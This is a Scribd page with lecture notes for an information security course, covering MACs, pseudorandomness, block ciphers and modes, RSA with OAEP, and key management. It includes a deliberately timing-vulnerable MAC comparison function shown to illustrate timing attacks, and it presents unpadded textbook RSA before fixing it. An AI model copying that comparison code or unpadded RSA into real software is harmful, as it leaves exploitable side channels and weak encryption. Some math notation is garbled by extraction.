0% found this document useful (0 votes)
28 views87 pages

COS432 InfoSec

The document discusses various topics related to information security including message integrity, randomness, block ciphers, asymmetric key cryptography, key management, authenticating users, SSL/TLS, access control, information flow, securing networks, spam, web security, and privacy. Cryptographic algorithms, protocols, and security concepts are explained at a high level throughout the document.

Uploaded by

ap274776
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
28 views87 pages

COS432 InfoSec

The document discusses various topics related to information security including message integrity, randomness, block ciphers, asymmetric key cryptography, key management, authenticating users, SSL/TLS, access control, information flow, securing networks, spam, web security, and privacy. Cryptographic algorithms, protocols, and security concepts are explained at a high level throughout the document.

Uploaded by

ap274776
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 87

Notes for COS 432 - Information Security∗

Contents
1 Message Integrity 2
Sending messages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Do PRF’s exist? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Cryptographic Hash Functions . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Timing Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Multiple Alice - Bob messages . . . . . . . . . . . . . . . . . . . . . . . . . . 6

2 Randomness 7
Randomness as a system service . . . . . . . . . . . . . . . . . . . . . . . . . 9
Message Confidentiality . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Confidentiality and integrity . . . . . . . . . . . . . . . . . . . . . . . . . . . 12

3 Block ciphers 13
128-bit AES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
How to handle variable-size messages . . . . . . . . . . . . . . . . . . . . . . 16

4 Asymmetric key cryptography 18


RSA algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Why not use public-key always? . . . . . . . . . . . . . . . . . . . . . . . . . 19
How to use public-key crpyto . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Secure RSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20

5 Key Management 23
How big should keys be? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Key management principles . . . . . . . . . . . . . . . . . . . . . . . . . . . 23

6 Authenticating people 27
Something you know: passwords . . . . . . . . . . . . . . . . . . . . . . . . . 27
Something you have . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Something you are . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30

7 SSL/TLS and Public Key Infrastructure 32


Observations on trust . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
Another problem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Public Key Infrastructure . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33

This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International
license. For details see https://creativecommons.org/licenses/by-nc/4.0/
2

Certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
Naming and identity verification . . . . . . . . . . . . . . . . . . . . . . . . . 34
Anchoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Revocation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35

8 Access control 36
Subjects and labels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
Traditional Unix File Access . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Capabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Logic-based authorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39

9 Information flow and multi-level security 40


Lattice model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
Information flow in a program . . . . . . . . . . . . . . . . . . . . . . . . . . 41

10 Securing network infrastructure 44


Prefix Hijacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
How to defend? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
IP packet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
Ingress/egress filtering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
DNS attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
Prevention: DNSSEC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
Crypto and layers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46

11 Spam 48
Economics of spam . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Anti-spam strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49

12 Web Security 53
Browser execution model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
Cookies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
CSRF: Cross-Site Request Forgery . . . . . . . . . . . . . . . . . . . . . . . 54
Cross Site Scripting (CSS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
SQL injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56

13 Web Privacy 57
Third parties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Tagging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
Fingerprinting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
More ways for websites to get your identity . . . . . . . . . . . . . . . . . . . 59
How security bugs contribute to online tracking . . . . . . . . . . . . . . . . 60
Defenses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60

14 Electronic voting 62
3

End-to-End (E2E) crypto voting . . . . . . . . . . . . . . . . . . . . . . . . 62


El Gamal encryption method . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Reencryption in El Gamal . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
In summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64

15 Backdoors in crypto standards 66


Data Encryption Standard (DES) . . . . . . . . . . . . . . . . . . . . . . . . 66
DUAL-EC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Digital Signature standard (DSS) . . . . . . . . . . . . . . . . . . . . . . . . 68
Backdoor-proof standardization . . . . . . . . . . . . . . . . . . . . . . . . . 68

20 Big data and privacy 69


How to achieve E-DP? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
Problems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
How to fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71

21 Economics of Security 72
Definitions of Efficiency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Market Failures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Solutions to Market Failures . . . . . . . . . . . . . . . . . . . . . . . . . . . 74

22 Human Factors in Security 76


Example: Wifi Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Case study: Email encryption (”Why Johnny Can’t Encrypt”) . . . . . . . . 77
Social Barriers to Adoption . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
Warning messages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
NEAT/SPRUCE Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . 79

23 Quantum Computing 80
Classical Bits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Quantum Bits (qubits) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Multi-qubit systems: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Advantages of QC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Implications for crypto . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
Quantum Key Exchange . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82

24 Password Cracking 84
Elementary Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Rainbow Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
4 1 Message Integrity

1 Message Integrity

Sending messages
 m  ?  
Alice −
→ Mallory →
− Bob 
Threat Models:, what adversary can do and accomplish vs. what we want to do and
accomplish. We generally assume that Mallory is malicious in the most devious possible
way, as opposed to random error. In this case of Alice sending Bob a message:
• Mallory can see and forge messages
• Mallory wants to get Bob to accept a message that Alice didn’t send
• Alice and Bob want Alice to be able to send a message and have Bob receive it
in an untampered form.
CIA Properties
• Confidentiality: trying to keep information secret from someone
• Integrity: making sure information hasn’t been tampered with
• Availability: making sure system is there and running when needed (hardest to
achieve!)

In this problem, the goal is only integrity.

Role of stories in security:


• Pro: easy to follow
• Cons:
– In reality,“Alice/Bob” is a computer; for example, a server with no common
sense
– In reality, “Alice/Bob” is a person + computer (one may have some knowl-
edge that other doesn’t, e.g. knowledge divergence in phishing attack)
– We might be biased into rooting for one side or the other and lose impar-
tiality

What to send:

 (m,f (m))  (a,b)  


Alice
 −−− − −→ Mallory
 
−− → Bob
 : accept a iff f (a) = b
where f is a Message Authentication Code (MAC)
1 Message Integrity 5

Properties f needs to be a secure MAC:


1. deterministic (Bob needs to get the same answer that Alice got every time)
2. easily computable by Alice and Bob
3. not computable by Mallory (else Mallory can send (x, f (x)) for any x s/he wants)
Choosing f :
• Picking a secret function is risky because it is difficult to quantify how likely
Mallory will be able to guess the function.
• Use a random function...

input output
∅ 01011... ← 256 coin flips
0 101...
1 ...

“secure MAC game”: Us vs. Mallory


repeat until Mallory says “stop”: {
Mallory chooses xi
we announce f (xi )
}
Mallory chooses y 6∈ {xi }
Mallory guesses f (y): wins if right

f is a secure MAC if and only if every efficient (polytime) strategy for Mallory
wins with negligible (probability that goes to 0) probability. In other words, f is
a secure MAC if Mallory can’t do better than random guessing.

Theorem. A random function is a secure MAC.


Intuition: Mallory asks to reveal certain entries, but for y Mallory is trying to
guess the result of the coin flips

• ...Or more practically, a pseudorandom function:


pseudorandom function (PRF): “looks random”, “as good as random”, prac-
tical to implement
typical approach:
– public family of function f0 , f1 , f2 , . . .
– secret key k which is, for example, a 256 bit random value
– use f (k, x)
6 1 Message Integrity

Kerckhoffs’s principle:
Use a public function family and a randomly chosen secret key. Advantages:

1. can quantify probability that key will be guessed


2. different people can use the same functions with different keys
3. can change key if needed (if it’s given out or lost)

“PRF game” against Mallory:


we flip a coin secretly to get b ∈ {0, 1}
if b = 0, let g = random function
else, g = f (k, x) for random k
repeat until Mallory says “stop”: {
Mallory chooses xi
we announce g(xi )
}
Mallory guesses latest b: wins if right

f is a PRF if and only if every efficient strategy for Mallory wins with probability
less than 0.5 +  where  is negligible.

Note: Mallory can always win by exhaustive search of the range of k in f (k, x),
so need to limit Mallory to “practical”

Theorem. If f is a PRF, then f is a secure MAC


Proof. By contradiction. There’s a reduction going on; we wanted to find a secure
MAC, which led us to wanting to find a secure PRF

What to send (new):

 (m,f (k,m)  (a,b)  


Alice
 −
− −− − −
→ Mallory
 
−− → Bob
 : accept a iff f (k, a) = b
Assumptions:
1. k is kept secret from Mallory
2. Alice and Bob have established k in advance
3. Mallory doesn’t tamper with the code that computes the function f (k, a)
1 Message Integrity 7

Do PRF’s exist?

Answer: maybe/ we hope so (some functions haven’t lost yet)

Here’s one: HMAC-SHA256

f (k, x) = S((k ⊕ z1 )||S((k ⊕ z2 )||x))

where z1 = 0x3636 . . . , z2 = 0x5c5c . . . (note that || is concatenation) and S is “SHA-


256”: start with “compression function” C, taking 256 and 512 bits in, outputting 256
bits
input pad
512 bit blocks
⇓ ⇓ ⇓ ⇓
const → C → C ··· output
Note: This is subject to length extension attacks

Cryptographic Hash Functions

They include MD5, SHA-1, SHA-?, etc: functions that take arbitrary size inputs and
return fixed size outputs that are “hard to reverse.” They are dangerous to use directly
because they don’t have the properties you think/want then to have.

Properties of a cryptographic hash function


1. Collision resistance:
Can’t find x 6= y such that H(x) = H(y)
2. Second preimage resistance:
Given x, can’t find y such that H(x) = H(y)
3. If x is chosen randomly from a distribution with high entropy, then given H(x),
you can’t find x
Better: use a PRF even if k is non-secret

Timing Attacks

Suppose Alice and Bob implement MAC-based integrity with the following code
8 1 Message Integrity

def macCheck(a, b, key) {


correctMac = Mac(key, a);
for (i = 0; i < length; ++i) {
if (correctMac[i] != b[i]) return false
}
return true
}
The problem? The execution time depends on the first n correct characters. Mallory
may observe the runtime to gain insight on cracking the code.

Multiple Alice - Bob messages

How to deal with Mallory sending messages out of order or resending old messages
1. append sequence number to each message:
Alice sends m00 = (0, m0 ), m01 = (1, m1 )
2. switch keys per message
2 Randomness 9

2 Randomness
Best way to get a value that is unknown to an adversary is to choose a random value,
but it’s hard to get this in practice. Randomness (or a lack thereof) is often a weakness
in a security system.

Recall from last lecture that a PRF works as a MAC.


What is a PRF?

Two views:
1. family of functions fk (x)
2. function f (k, x). This is the view we’ll be using for this class.

True randomness:
• outcome of some inherently random process
• assume it “exists” but it’s scarce and hard to get
In security, ”random” means unpredictable:
• to whom? E.x., in a PRF, the result can be considered random with respect to
someone who does not know the secret key.
• when?
Pseudorandom generator (PRG):
• takes a small “seed” that’s truly random as input E.x. a few coin flips, instead
of flipping a coin each time
• generates a long sequence of “good enough” values, i.e. unlimited pseudoran-
domness.
• maintains “hidden state” that changes as generator operates
• output is indistinguishable from truly random output in the practical sense, i.e.
an efficient party can not distinguishs
• the generator needs to be deterministic, because if it is not it must be driven by
some kind of randomness, and the reason we are doing this is because randomness
is scarce
Randomness service:
• OS service, callable by application
10 2 Randomness

Definition. PRG is secure if its output is indistinguishable from a truly random


value/string.
This is based on the game versus Mallory (can Mallory tell real randomness from prg?
similar to prf game from lecture 1), where secure means that Mallory wins 50% (+)
assuming Mallory has limited resources, where  is negligible. 

init advance advance


Seed −−→ S0 −−−−→ S1 −−−−→ S2 etc.
↓ ↓ ↓
output0 output1 output2

Another desirable property is Forward Secrecy (backtracking resistance):


If Mallory compromises the hidden state of the generator at time t, Mallory can’t back-
track to reconstruct past outputs of the generator.

Note that if an adversary breaks in at time t, they can play it forward and see the
outputs at time t + x
Most PRGs are made up of an init function to initialize state S and an advance
function to step to a new state.

Example. A PRG that is not FS but is secure:


• Let f be a PRF
• init: (seed, 0)
• advance: (seed, k) → (seed, k + 1)
• output: f (seed, k)
If Mallory knows the counter k at any point, she can decrement it and run the function
forwards again. 

Example. A PRG that is FS and secure:


• Let f be a PRF
• init: seed
• advance: S → f (S, 0)
• output: f (S, 1)
This resists backtracking because the advance function relies on the PRF, and the seed
is overwritten
2 Randomness 11

NOTE: The advance function should be performed after generating an output, and not
the other way around. If you do not advance after generating the output, the hidden
state that was used to generate the most recent output stays in memory. If at any time
between this and the next time you generate a new output the adversary is able to
compromise your system, they would learn the hidden state and are able to reconstruct
the last output (not backtracking resistant!). 

Randomness as a system service

Hard parts: getting seed, recovering from compromise, even if we don’t know whether
the state has been compromised. We want to be continuously recovering because we
might not notice a compromise.
Create a new function, recover(S, randomdata) → state

Getting a good seed: want true randomness


• special circuit
• ambient audio/video: lava lamps! (lavarand)
problems: physical random processes are difficult in practice, not truly random (corre-
lations)

Alternate view: collect data unpredictable to adversary


• exact history of key presses
• exact path of mouse
• exact history of packet traffic
• periodic screenshot
• internal temperature
• ambient audio
Then: process to extract, or distill down to “pure” randomness - feed it all into a
PRF. If there’s enough randomness in input, output will be “pure random”. Can, for
example, use SHA256(all the data). SHA256 consumes data one block at a time, so
we don’t need to collect and store all the data; we can get/use the data iteratively.

Use this to:


• seed the system PRG
12 2 Randomness

• recover/renew the state (mix fresh randomness in with hidden state) using PRF,
to re-establish secrecy of hidden state

NOTE: Mistake to add a single bit at a time since Mallory can keep up with 2
possibilities at a time, but if we wait until have a lot, say 256 bits of randomness,
then Mallory can’t keep up (2256 possibilities), even if she knows the algorithm
used.
Hard to estimate actual amount of entropy in pool, so wait for too much randomness
before mixing to remain conservative.
There’s also a problem with “headless” machines, like servers, that don’t have enough
areas of randomness to draw from.
Linux:
• /dev/random gives pure random bits, but have to wait
• /dev/urandom is output of PRG, renewed via “pure” randomness
The boot problem: At startup,
• least access to randomness (system is clean)
• highest demand for randomness (programs want keys)
Solutions (with their problems):
• save some randomness only accessible at boot:
hard to tell that this hasn’t been observed, or used on last boot
• connect to someone across network to give pseudorandomness:
want secure connection but don’t yet have key (okay if have just enough for that
key, or semi-predictable and hope Mallory doesn’t guess)

Message Confidentiality

Now may
 have  a(passive)
 adversary/eavesdropper Eve who can only listen:
Alice → Bob 
↓ 
Eve 

Message processing:
plaintext ciphertext plaintext
−−−−−→ E (encrypts) −−−−−→ D (decrypts) −−−−−→
↑ ↑
key k key k
2 Randomness 13

Goal: ciphertext does not convey anything about plaintext. Bob can recover text, Eve
cannot.
Semantic Security
“Encryption game” against Eve:

Allow Eve to pick piece of plaintext, we provide encryption Ek (xi ) until she
is satisified Eve chooses two pieces of plaintext
We flip a coin and encrypt one of them
Eve guesses which was encrypted: wins if right
We say that the encrpytion method is secure if Eve can’t do better than random
guessing (50/50) + negligible . This is known as semantic security.

Note: if we were being more rigorous in our definitions, we would use a stronger defi-
nition of security for encryption here so that it’s easier to combine later with integrity.
However, the methods we are learning are secure by any of the definitions.

First approach: one-time pad (known to be semantically secure)


1. Alice and Bob jointly generate a long random string k (“the pad”)
2. E(k, x) = k ⊕ x
3. D(k, y) = k ⊕ y = k ⊕ (k ⊕ x) = (k ⊕ k) ⊕ x = x
Problems:
1. can’t reuse key:
(k ⊕ a) ⊕ (k ⊕ b) = a ⊕ b
worst case, Eve knows one message, but even knowing that the messages are say
English text can give Eve information from character distributions
2. need really long key – needs to be as long as sum of message lengths
Idea: use a PRG to “stretch” a small key (called a “stream cipher”)
• Start with fixed-size random k, add a “nonce”: unique, i.e. don’t resue nonce
value, but not secret. Use PRF(k, nonce) to seed a PRG.
• Alice and Bob run identical PRGs in parallel with same key
• xor messages with PRG’s output
• Do not re-use (key, nonce) pair
This approach still does not provide integrity.
14 2 Randomness

Confidentiality and integrity

Few approaches.
1. Use E(x || M(x)) SSL/TLS
2. Use E(x) || M(E(x)) IPSec **This is the winner (because math).
3. Use E(x) || M(x) SSH

Theorem 2.1. If E is a semantically secure cipher, and M is a secure MAC, then #2


is secure.
Encrypt plaintext, then append MAC: Bob first integrity checks, then decrypts. Note
that we need to use separate keys for confidentiality and integrity, and a separate set
of two keys for reverse channel (Bob to Alice).

If we have only one shared key, we seed the PRG with the shared key and then use
four values it produces for the message sending.
3 Block ciphers 15

3 Block ciphers

Story from WWII:


Pacific war: lots of radio communications; crypto and US decryptions paid a huge role
Admiral Nimitz had advantage of code break giving Japanese battle plan (Battle of
Midway)
Most successful code was used by the US Marines: the Navajo language served as a
code by translating the first letter of an English word into a Navajo word and sending
that by radio (allowed speech communication).
Even when they got a Navajo speaker, the Japanese were unable to usefully decrypt
these messages.

Last time: Stream ciphers

E(k, m) = D(k, m) = PRG(k) ⊕ m

Alternative approach: Block ciphers


Start with function that encrypts a fixed-size block of data (and fixed-size key) and
build up from there
• may run faster
• many PRGs work this way anyway
Note that block cipher is not the same thing as a PRF, since a PRF may have no
inverse (∃x1 , x2 s.t. f (k, x1 ) = f (k, x2 )
Want: psuedorandom permutation (PRP)
• function from n-bit input (plus key) to n-bit output
• if x1 6= x2 , then f (k, x1 ) 6= f (k, x2 )
• psuedorandom as expected from previous definitions – should be indistinguishable
from truly random to an adversary
It is useful to compare the different types of security functions we have seen. Note:
Can use any of PR function/permutation/generator to build the other two.

Property PR Functions PR Permutations PR Generators Hash Functions


Input Any Fixed-size Fixed-size Any
Output Fixed-size Fixed-size Any Fixed-size
Has Key Yes Yes Yes No
Invertible No With key No Depends
Collisions Yes, but can’t find No No Yes, but can’t find
16 3 Block ciphers

Challenge: design a very hairy function that’s invertible, but only by someone who
knows the key. A PRP will have this property.

Minimal properties of a good block cipher:


• efficient
• highly nonlinear (“confusion property”) - hard for adversary to invert
• mix input bits together (“diffusion”) - every input bit affects the output
• depend on the key
How to get these properties: Feistel network, given that f is a PRF
plaintext
left half | right half
↓ ↓
⊕ ←− f (k0 ) ←− ↓ “feistal round”
↓ ↓
————————————————
↓ −→ f (k1 ) −→ ⊕ another round
↓ ↓

Add as many rounds as you want, alternating left and right rounds.

Why? Easy to invert since each round is its own inverse, so inverse of series of rounds
is the same series in reverse order. This makes it so that f can be as difficult as we
want and the process is still invertible, so why not make f a PRF?

Theorem. If f is a PRF, then 4-round feistel network is a PRP.


Often use weaker rounds (which may be faster to compute), but more of them.

Example. DES (Data Encryption Standard)


• block size = 64 bits
• 56-bit key
• Feistel network - 16 (weak) rounds
History:
• designed in secrey by IBM and NSA in 1978
• US government standard
3 Block ciphers 17

• private sector followed


Backdoor known to designers but not public? Concerns by public over the source -
history of US offering other governments intentionally weak ciphers
Reason for secrecy around design was that some of the classification: wanted to make
secure against differential cryptanalysis, but that wasn’t publicly known yet and NSA
wanted to keep using it against others.
Designed to be slow in software to discourage it from being implemented in software
Key size problem:
256 steps for a brute-force search to recover an unknown key, which is currently feasable,
though not in 1978 (except maybe by NSA?)
This can be addressed by iterating DES with multiple keys. Note that you need to do
this three times to get 2112 for brute force search. 

Example. AES (Advanced Encryption Standard) Probably the best available today,
coming from overcoming drawbacks of DES
• software efficiency a goal
• large, variable key size (128-, 192-, 256-bit variants)
• open, public process for choosing and generating the cipher
run by NIST and a design contest judged on pre-determined criteria
2002 - NIST chose Rijndael (Belgian designers) 

128-bit AES

• 128-bit input, output, and key


• not feistel design
• lookup table public
• ten rounds (generally cryptanalysis is a small-round break and then extending
the tactic to a full number of rounds, so use a safe number then add extra rounds
for safety buffer), each with four steps
1. non-linear step (“confusion”):
run each byte through a certain non-linear function (lookup table of a per-
mutation)
2. shift step (“diffusion”):
18 3 Block ciphers

think of 128-bits as 4x4 array of bytes: shift the ith row left i steps; values
that fall off wrap around the same row. (circular shift)
spreads out columns
3. linear mix (“diffusion”):
take each column, treat as 4-vector and multiply by a certain matrix (spec-
ified in standard)
mixes within column
4. key-addition step (key-dependent):
xor each byte with corresponding byte of the key
Note: the key expansion could be a source of weakness (to get the ten keys
needed from one)
• to decrypt, do inverses in reverse order

How to handle variable-size messages

Problems:
• padding - plaintext not a multiple of blocksize
• “cipher modes” - dealing with multi-block messages
Padding: most important property needs to be that recipient can unambiguously tell
what is padding and what is not

Good method: add bits 10* until reach end of block (pull off all 0’s at end then the 1).
Remember that you must add some padding (at least one bit) to every message. This
works similarly with bytes.

Cipher modes: encrypt multi-block messages


• ECB (Electronic Code Book) !! BAD - not semantically secure - do not use !!

Ci = E(k, Pi )

Same plaintext results in same ciphertext – leaks information to adversary


• CBC (Cipher Block Chaining): Common, pretty good
“strawman CBC”, Ri random

Ci = (Ri , E(k, Ri ⊕ Pi )
3 Block ciphers 19

Good, but doubles message size


Idea: use Ci−1 instead of Ri

Ci = E(k, Ci−1 ⊕ Pi )
What about the first block? Generate a random value, the “initialization vector
(IV)”, to prepend to message to serve as C−1 . Don’t want to reuse with same
key, or adversary could compare the first block of the ciphertext to see if same
plaintext, but random-ish generation good enough, and can use same key over
and over.
• CTR (Counter mode): Generally agreed on as best to use. Similar to a stream
cipher.
Ci = E(k, messageid||counter) ⊕ Pi
messageid must be unique, then it’s okay to reuse key.
Note: this would not be forward secret as a PRG.
Reasons to use CTR over PRG: more efficient on commodity hardware and per-
haps you trust AES more than your PRF (even though you can’t prove it either
way).
20 4 Asymmetric key cryptography

4 Asymmetric key cryptography


Symmetric key: use the same key to encrypt and decrypt
Problems:
• Integrity: Alice sending to Bob, Charlie, Diana, ...
If Alice, Bob, Charlie, Diana all have key k, then Bob could compute a MAC on a
message and deliever a message to Charlie and Diana, thereby forging a message
It would be nice if Alice were the only one who could send a verified message
without needing to append everyone’s integrity key (one per recipient)
• Confidentiality: maybe only Alice should be able to decrypt a message
Asymmetric scheme: 1976, Diffie-Hellman(-Cox for British military)
• One key for encrypting, another for decrypting
• One key for MAC, another for verifying it

Definition. “public-key” cryptography


Almost always:
• Generate key-pair such that can’t derive one key from the other
• One key is kept private (only Alice knows it)
• Other key is public (everyone knows it)


RSA algorithm

** We implemented this in hw2 **


• Best-known, most used public key algorithm
• 1978, Rivest-Shamir-Adleman
How it works:
To generate an RSA key pair,
1. Pick large secret primes p, q (randomly chosen, typically 2048 bits)
Done by generating odd numbers in range and testing if prime, throwing away
if not prime and trying again. Primes are dense enough that this isn’t too bad,
and primality testing is also okay in terms of time.
4 Asymmetric key cryptography 21

2. Define N = pq
Useful fact: if p, q are prime, for all 0 < x < pq,

x(p−1)(q−1) mod pq = 1

3. Pick e such that 0 < e < pq, e relatively prime to (p − 1)(q − 1)


4. Find d such that ed mod (p − 1)(q − 1) = 1. You can use euclid’s algorithm to
find d.
The public key is (e, N ) and the private key is (d, N ) [+(p, q)].
To encrypt or decrypt with public key:

RSA((e, N ), x) = xe mod N

To encrypt or decrypt with private key:

RSA((d, N ), x) = xd mod N

Theorem. “It works”

Proof.

RSA((e, N ), RSA((d, N ), x))


= (xd mod pq)e mod pq
de
=x mod pq
a(p−1)(q−1)+1
=x mod pq, for some a
= (x(p−1)(q−1) )a x mod pq
= (x(p−1)(q−1) mod pq)a x mod pq
= 1a x mod pq
= x mod pq
= x, given 0 < x < pq

Best known attack is to try factoring N to get p, q

Why not use public-key always?

• It’s slow (∼1000x slower than symmetric); you’re exponentiating huge numbers
• Key is big (∼4k bits)
22 4 Asymmetric key cryptography

How to use public-key crpyto

For confidentiality: (“your eyes only”)


• Encrypt with public key
• Decrypt with private key
For integrity: (“digital signature”)
• “Sign” by encrypting with private key
• “Verify” by decrypting with public key

Secure RSA

!! Warning: Not secure as described above, need to fix !!

Problem 1:
Suppose (e, N ) = (3, N ). Given ciphertext 8 that was encrypted with (3, N ) it’s trivial
that x3 mod N = 8 has x = 2. This shows that you may run into trouble when
encrypting small messages.

Problem 2 (Malleability):

RSA((d, N ), x) · RSA((d, N ), y) mod N = (xd mod N )(y d mod N ) mod N


d
= (xy) mod N
= RSA((d, N ), xy)

RSA((d, N ), xy) is the signature for the message xy! Adversary could use this to win
the game defining security of the cipher

Definition. Malleability
Adversary can manipulate ciphertext, get predictable result for decrypted plaintext.
This is usually bad, but sometimes we want a malleable cipher (for some application)


Lesser problems:
• Same plaintext results in same ciphertext (deterministic)
• No built-in integrity check
4 Asymmetric key cryptography 23

To solve all these problems, add a preprocessing step before encryption. The standard
way is call OAEP (Optimal Asymmetric Encyption Padding):
1. Generate 128 bit random value, run through PRG G
2. XOR with message padded with 128 bits of zeros
3. Run result through PRF H, a hash function with announced key
4. XOR with the random bits
5. Concatenate result and send to RSA encyption
128 bits 128 bits
message | 000... random
↓ ↓
⊕ ←− G ←− ↓
↓ ↓
↓ −→ H −→⊕
↓ ↓

to RSA encrpytion

Also add the reverse as a postprocessing step after decryption:


from RSA encrpytion

↓ ↓
↓ −→ H −→⊕
↓ ↓
⊕ ←− G ←− ↓
↓ ↓
0 0
m | z r0

Reject if z 0 is not all zero, otherwise throw away r0 and let m0 be the result of the
decyption. m0 should at this point be equal to the original message.
Other things to clean up:
• Key size
– To get a big enough key space, need lots of possible primes
– Factoring is better than brute force
– Factoring algorithms might get better, so build in cushion in key size to
account for incremental improvements in these algorithms.
24 4 Asymmetric key cryptography

– Today, 2048-bit primes seem okay


• Useful performance trick
– e = 3 and make sure p and q are chosen such that 3 is relatively prime to
p − 1 and q − 1
– This is extra-big win for digital signatures since verify is the common case.
– But: what if OAEP disappears from your code?
Use e = 65537 = 216 + 1 instead
• Hybrid crypto: To encrypt a large message,
– Generate random symmetric key k
– Encrypt k with RSA
– Encrypt message with k
Sometimes share the symmetric key using RSA and use that to generate further
keys to avoid using public-key crypto more than necessary
• Hybrid digital signatures: RSA sign(Hash(message))
• Claimed identities
Suppose we get a message from “Alice” with a digital signature md mod N . We
can verify using (md mod N )e mod N , but how can we be sure of Alice’s public
key if we don’t know Alice?
Use a digitial certificate (“cert”):
– Bob signs a message saying “Alice’s public key is (...)”
– This works if we know Bob and believe him to be trustworthy and compe-
tent.
– If we don’t know Bob, then we need to ask Charlie if Bob is trustworthy
and compentent.
– But if we don’t know Charlie...
– Most common solution: pick universally trustworthy “certificate authority”
who gives out keys

There is also the Web of Trust approach


– Everybody certifies their friends, and if you can find a mutual friend, you’re
good and people will trust you.
5 Key Management 25

5 Key Management

US for a long time put restrictions on export of cryptographic software, the same
restrictions as munitions, requiring a special license.
Java, for example, would have liked to include crypto along with runtime libraries but
hard to get license. Possible solutions:
• plugin architecture: could plug-in if they have their own
• designed libraries in a way convenient for people who want to implement their own
crypto (export general purpose math library without the export-control issues.

How big should keys be?

A key should be so big an adversary has negligible chance of guessing it.


• Watch out for Moore’s law: Computers double in speed every 18 months. So,
you need to add one more bit every 18 months.
• For symmetric ciphers, 128 bits is plenty: 2128 ≈ 1039 , so at 1 trillion guesses per
second, takes 10 quadrillion times the lifetime of the universe.
• Need larger for PRF/hash: suppose we’re using for digital signature, then we’re
in trouble if adversary finds a “collision” (x1 6= x2 s.t. H(x1 ) = H(x2 )). Finding
a collision is more efficient than finding key.
“Birthday attack”:
Generate 2b/2 items at random, look for collisions in that set (b is the bit-length
of your hash). Odds are ∼50%.
Attack requires O(2b/2 ) time and O(2b/2 ) space, also possible in constant space.
Pepople can generate invalid digital certificates through exploiting these colli-
sions.
Upshot: PRF output size is typically 2x cipher output size to be safe (256 bits)

Key management principles

0. Key management is the hard part


1. Keys must be strongly (pseudo)random
2. Different keys for different purposes (signing/encrypting, encrypting vs MACing,
Alice to Bob vs Bob to Alice, different protocols)
3. Vulnerability of a key increases
26 5 Key Management

• the more you use it


• the more places you store it
